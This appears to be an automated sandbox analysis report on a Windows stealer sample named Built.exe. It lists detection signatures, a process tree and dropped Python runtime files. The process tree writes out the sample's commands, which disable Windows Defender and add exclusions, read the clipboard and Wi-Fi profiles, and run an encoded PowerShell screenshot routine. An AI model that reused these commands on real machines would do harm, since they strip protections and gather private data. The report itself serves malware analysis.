Resubmissions

15-10-2024 15:51

241015-tapjrashkh 10

15-10-2024 15:23

241015-sszxrs1hle 10

Analysis

  • max time kernel
    4s
  • max time network
    4s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-10-2024 15:23

General

  • Target

    Built.exe

  • Size

    6.9MB

  • MD5

    292930cf8424cc4f326496659d841539

  • SHA1

    654d24c6266ae4b1c9dd46c3dcc3da1640233146

  • SHA256

    274d40c02c31eb2fcb5b9703a716a6c46b48b72a2ef3d886dd0b2587745c0d81

  • SHA512

    df3c73b3b6148ce29f82d4882f56a8ca52f341bd5b832efd4c0e09932a444d155850a6baa421e9fab7699e333c3ab6c4d2165bd338c764d37384021d835c0989

  • SSDEEP

    98304:ICDjWM8JEE1rM9a3amaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYKJJcGhEr:IC0Ia6eNTfm/pf+xk4dWRptrbWOjgrV

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 4 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 39 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious use of WriteProcessMemory 2 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2868
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Loads dropped DLL
      PID:5272
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
          PID:5900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            PID:5920
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          3⤵
            PID:3356
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:1604
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​‍  .scr'"
            3⤵
              PID:1040
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​‍  .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2176
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:4300
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:3040
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:2524
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:5000
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                  3⤵
                    PID:2720
                    • C:\Windows\System32\Wbem\WMIC.exe
                      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                      4⤵
                        PID:3824
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                      3⤵
                      • Clipboard Data
                      PID:2776
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-Clipboard
                        4⤵
                        • Clipboard Data
                        PID:5068
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      3⤵
                        PID:2924
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          4⤵
                          • Enumerates processes with tasklist
                          PID:3696
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:1332
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:1000
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                            3⤵
                            • System Network Configuration Discovery: Wi-Fi Discovery
                            PID:1008
                            • C:\Windows\system32\netsh.exe
                              netsh wlan show profile
                              4⤵
                              • System Network Configuration Discovery: Wi-Fi Discovery
                              PID:5732
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "systeminfo"
                            3⤵
                              PID:5508
                              • C:\Windows\system32\systeminfo.exe
                                systeminfo
                                4⤵
                                • Gathers system information
                                PID:3176
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                              3⤵
                                PID:3708
                                • C:\Windows\system32\reg.exe
                                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                  4⤵
                                    PID:2072
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                  3⤵
                                    PID:1952
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                      4⤵
                                        PID:4404
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4zcx0zez\4zcx0zez.cmdline"
                                          5⤵
                                            PID:1200
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:5676
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:5840
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                            3⤵
                                              PID:484
                                              • C:\Windows\system32\attrib.exe
                                                attrib -r C:\Windows\System32\drivers\etc\hosts
                                                4⤵
                                                • Views/modifies file attributes
                                                PID:3540
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:3380
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:1944
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                  3⤵
                                                    PID:5180
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +r C:\Windows\System32\drivers\etc\hosts
                                                      4⤵
                                                      • Views/modifies file attributes
                                                      PID:412
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:2244

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  627073ee3ca9676911bee35548eff2b8

                                                  SHA1

                                                  4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                  SHA256

                                                  85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                  SHA512

                                                  3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  408641808e457ab6e23d62e59b767753

                                                  SHA1

                                                  4205cfa0dfdfee6be08e8c0041d951dcec1d3946

                                                  SHA256

                                                  3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258

                                                  SHA512

                                                  e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  05b3cd21c1ec02f04caba773186ee8d0

                                                  SHA1

                                                  39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

                                                  SHA256

                                                  911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

                                                  SHA512

                                                  e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\VCRUNTIME140.dll

                                                  Filesize

                                                  96KB

                                                  MD5

                                                  f12681a472b9dd04a812e16096514974

                                                  SHA1

                                                  6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                                                  SHA256

                                                  d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                                                  SHA512

                                                  7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\_bz2.pyd

                                                  Filesize

                                                  46KB

                                                  MD5

                                                  0c13627f114f346604b0e8cbc03baf29

                                                  SHA1

                                                  bf77611d924df2c80aabcc3f70520d78408587a2

                                                  SHA256

                                                  df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

                                                  SHA512

                                                  c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\_ctypes.pyd

                                                  Filesize

                                                  57KB

                                                  MD5

                                                  38fb83bd4febed211bd25e19e1cae555

                                                  SHA1

                                                  4541df6b69d0d52687edb12a878ae2cd44f82db6

                                                  SHA256

                                                  cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

                                                  SHA512

                                                  f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\_decimal.pyd

                                                  Filesize

                                                  104KB

                                                  MD5

                                                  7ba541defe3739a888be466c999c9787

                                                  SHA1

                                                  ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac

                                                  SHA256

                                                  f90efa10d90d940cde48aafe02c13a0fc0a1f0be7f3714856b7a1435f5decf29

                                                  SHA512

                                                  9194a527a17a505d049161935432fa25ba154e1aee6306dee9054071f249c891f0ca7839de3a21d09b57fdc3f29ee7c4f08237b0dfffafa8f0078cfe464bed3b

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\_hashlib.pyd

                                                  Filesize

                                                  33KB

                                                  MD5

                                                  596df8ada4b8bc4ae2c2e5bbb41a6c2e

                                                  SHA1

                                                  e814c2e2e874961a18d420c49d34b03c2b87d068

                                                  SHA256

                                                  54348cfbf95fd818d74014c16343d9134282d2cf238329eec2cda1e2591565ec

                                                  SHA512

                                                  e16aad5230e4af7437b19c3db373b1a0a0a84576b608b34430cced04ffc652c6fb5d8a1fe1d49ac623d8ae94c8735800c6b0a12c531dcdd012b05b5fd61dff2e

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\_lzma.pyd

                                                  Filesize

                                                  84KB

                                                  MD5

                                                  8d9e1bb65a192c8446155a723c23d4c5

                                                  SHA1

                                                  ea02b1bf175b7ef89ba092720b3daa0c11bef0f0

                                                  SHA256

                                                  1549fe64b710818950aa9bf45d43fe278ce59f3b87b3497d2106ff793efa6cf7

                                                  SHA512

                                                  4d67306fe8334f772fe9d463cb4f874a8b56d1a4ad3825cff53cae4e22fa3e1adba982f4ea24785312b73d84a52d224dfb4577c1132613aa3ae050a990e4abdf

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\_queue.pyd

                                                  Filesize

                                                  24KB

                                                  MD5

                                                  fbbbfbcdcf0a7c1611e27f4b3b71079e

                                                  SHA1

                                                  56888df9701f9faa86c03168adcd269192887b7b

                                                  SHA256

                                                  699c1f0f0387511ef543c0df7ef81a13a1cffde4ce4cd43a1baf47a893b99163

                                                  SHA512

                                                  0a5ba701653ce9755048ae7b0395a15fbb35509bef7c4b4fe7f11dc4934f3bd298bcddbf2a05b61f75f8eb44c4c41b3616f07f9944e0620b031cbe87a7443284

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\_socket.pyd

                                                  Filesize

                                                  41KB

                                                  MD5

                                                  4351d7086e5221398b5b78906f4e84ac

                                                  SHA1

                                                  ba515a14ec1b076a6a3eab900df57f4f37be104d

                                                  SHA256

                                                  a0fa25eef91825797f01754b7d7cf5106e355cf21322e926632f90af01280abe

                                                  SHA512

                                                  a1bcf51e797ccae58a0b4cfe83546e5e11f8fc011ca3568578c42e20bd7a367a5e1fa4237fb57aa84936eec635337e457a61a2a4d6eca3e90e6dde18ae808025

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\_sqlite3.pyd

                                                  Filesize

                                                  54KB

                                                  MD5

                                                  d678600c8af1eeeaa5d8c1d668190608

                                                  SHA1

                                                  080404040afc8b6e5206729dd2b9ee7cf2cb70bc

                                                  SHA256

                                                  d6960f4426c09a12488eb457e62506c49a58d62a1cb16fbc3ae66b260453c2ed

                                                  SHA512

                                                  8fd5f0fd5bd60c6531e1b4ad867f81da92d5d54674028755e5680fb6005e6444805003d55b6cbaf4cdad7b4b301cffab7b010229f6fd9d366405b8ade1af72d9

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\_ssl.pyd

                                                  Filesize

                                                  60KB

                                                  MD5

                                                  156b1fa2f11c73ed25f63ee20e6e4b26

                                                  SHA1

                                                  36189a5cde36d31664acbd530575a793fc311384

                                                  SHA256

                                                  a9b5f6c7a94fb6bfaf82024f906465ff39f9849e4a72a98a9b03fc07bf26da51

                                                  SHA512

                                                  a8181ffeb3cf8ef2a25357217a3dd05242cc0165473b024cf0aeb3f42e21e52c2550d227a1b83a6e5dab33a185d78e86e495e9634e4f4c5c4a1aec52c5457dca

                                                • C:\Users\Admin\AppData\Local\Temp\_MEI28682\base_library.zip

                                                  Filesize

                                                  1.4MB

                                                  MD5

                                                  83d235e1f5b0ee5b0282b5ab7244f6c4

                                                  SHA1

                                                  629a1ce71314d7abbce96674a1ddf9f38c4a5e9c

                                                  SHA256

